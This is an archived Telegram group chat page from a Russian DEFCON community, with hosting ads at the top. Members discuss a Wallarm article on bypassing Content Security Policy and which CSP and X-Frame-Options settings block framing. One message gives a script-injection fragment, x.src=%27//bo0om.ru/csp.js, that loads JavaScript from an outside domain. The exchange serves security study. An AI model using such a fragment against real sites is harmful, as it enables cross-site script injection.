В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

DCG#7812 DEFCON-RUSSIA

839 membersпожаловаться на группу
2018 July 23

PD

Peter Destructive in DCG#7812 DEFCON-RUSSIA
D1g1
техническими статьями всем можно)
+
источник
18:52пожаловаться#1

B

Bo0oM in DCG#7812 DEFCON-RUSSIA
Bo0oM
Кто про кавычки, зацените
https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
Там смешно (и грустно).
источник
18:52пожаловаться#2

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
Ща заценю
источник
18:55пожаловаться#3

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
Bo0oM
Кто про кавычки, зацените
https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
да, прикольно
источник
18:58пожаловаться#4

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
а в CSP можно запретить фарймы на сторонние домены?
источник
18:58пожаловаться#5

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
X-Frame-Options: Deny
источник
18:59пожаловаться#6

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
ну это не ЦСП
источник
18:59пожаловаться#7

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
а в ЦСП?
источник
18:59пожаловаться#8

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
frame-src добавить надо
источник
19:00пожаловаться#9

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
?
источник
19:00пожаловаться#10

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
и все
источник
19:00пожаловаться#11

B

Bo0oM in DCG#7812 DEFCON-RUSSIA
Alexey Sintsov
а в CSP можно запретить фарймы на сторонние домены?
По дефолту (self) запрещено стронние
источник
19:00пожаловаться#12

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
твой хак обломан?
источник
19:00пожаловаться#13

B

Bo0oM in DCG#7812 DEFCON-RUSSIA
Тут фича в том, что фрейм не сторонний
источник
19:01пожаловаться#14

B

Bo0oM in DCG#7812 DEFCON-RUSSIA
:D
источник
19:01пожаловаться#15

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
x.src=%27//bo0om.ru/csp.js
источник
19:01пожаловаться#16

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
ну давй тестанем
источник
19:01пожаловаться#17

B

Bo0oM in DCG#7812 DEFCON-RUSSIA
Это уже подгрузка жс внешнего
источник
19:01пожаловаться#18

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
поставь self
источник
19:01пожаловаться#19

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
хочу глянуть
источник
19:01пожаловаться#20